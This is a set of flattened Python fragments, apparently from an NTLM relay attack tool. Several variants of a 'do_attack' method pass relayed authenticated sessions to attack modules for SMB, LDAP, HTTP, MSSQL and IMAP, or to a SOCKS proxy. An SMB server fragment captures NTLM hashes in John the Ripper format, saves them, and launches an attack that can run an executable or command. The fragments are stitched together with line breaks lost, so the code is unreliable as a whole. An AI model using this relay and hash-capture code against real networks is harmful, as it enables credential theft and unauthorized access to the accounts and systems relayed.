def do_attack(self, client, connData=None): #Do attack. Note that unlike the HTTP server, the config entries are stored in the current object and not in any of its properties if self.target[0] == 'SMB': if self.config.runSocks is True: # For now, we only support SOCKS for SMB, for now. # Pass all the data to the socksplugins proxy activeConnections.put( (self.target[1], 445, self.authUser, client, connData)) logging.info( "Adding %s(445) to active SOCKS connection. Enjoy" % self.target[1]) else: clientThread = self.config.attacks['SMB'](self.config, client, self.authUser) clientThread.start() if self.target[0] == 'LDAP' or self.target[0] == 'LDAPS': clientThread = self.config.attacks['LDAP'](self.config, client, self.authUser) clientThread.start() if self.target[0] == 'HTTP' or self.target[0] == 'HTTPS': clientThread = self.config.attacks['HTTP'](self.config, client, self.authUser) clientThread.start() if self.target[0] == 'MSSQL': clientThread = self.config.attacks['MSSQL'](self.config, client) clientThread.start() if self.target[0] == 'IMAP' or self.target[0] == 'IMAPS': clientThread = self.config.attacks['IMAP'](self.config, client, self.authUser) clientThread.start()
def do_attack(self): # Check if SOCKS is enabled and if we support the target scheme if self.server.config.runSocks and self.target.scheme.upper() in self.server.config.socksServer.supportedSchemes: # Pass all the data to the socksplugins proxy activeConnections.put((self.target.hostname, self.client.targetPort, self.authUser, self.client, self.client.sessionData)) return # If SOCKS is not enabled, or not supported for this scheme, fall back to "classic" attacks if self.target.scheme.upper() in self.server.config.attacks: # We have an attack.. go for it clientThread = self.server.config.attacks[self.target.scheme.upper()](self.server.config, self.client.session, self.authUser) clientThread.start() else: LOG.error('No attack configured for %s' % self.target.scheme.upper())
def do_attack(self,client): #Do attack. Note that unlike the HTTP server, the config entries are stored in the current object and not in any of its properties # Check if SOCKS is enabled and if we support the target scheme if self.config.runSocks and self.target.scheme.upper() in self.config.socksServer.supportedSchemes: if self.config.runSocks is True: # Pass all the data to the socksplugins proxy activeConnections.put((self.target.hostname, client.targetPort, self.target.scheme.upper(), self.authUser, client, client.sessionData)) return # If SOCKS is not enabled, or not supported for this scheme, fall back to "classic" attacks if self.target.scheme.upper() in self.config.attacks: # We have an attack.. go for it clientThread = self.config.attacks[self.target.scheme.upper()](self.config, client.session, self.authUser) clientThread.start() else: LOG.error('No attack configured for %s' % self.target.scheme.upper())
smbClient.setUid(0) #Log this target as processed for this client self.targetprocessor.log_target(connData['ClientIP'],self.target) return None, [packet], errorCode # Now continue with the server else: # We have a session, create a thread and do whatever we want ntlm_hash_data = outputToJohnFormat( '', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'] ) logging.info(ntlm_hash_data['hash_string']) if self.server.getJTRdumpPath() != '': writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.getJTRdumpPath()) if self.config.runSocks is True and self.target[0] == 'SMB': # For now, we only support SOCKS for SMB, for now. # Pass all the data to the socksplugins proxy activeConnections.put((self.target[1], 445, sessionSetupData['Account'], smbClient, connData)) logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target[1]) else: #TODO: Fix this for other protocols than SMB [!] clientThread = self.config.attacks['SMB'](self.config,smbClient,self.config.exeFile,self.config.command) clientThread.start() #Log this target as processed for this client self.targetprocessor.log_target(connData['ClientIP'],self.target) # Remove the target server from our connection list, the work is done del (smbData[self.target]) # Now continue with the server #############################################################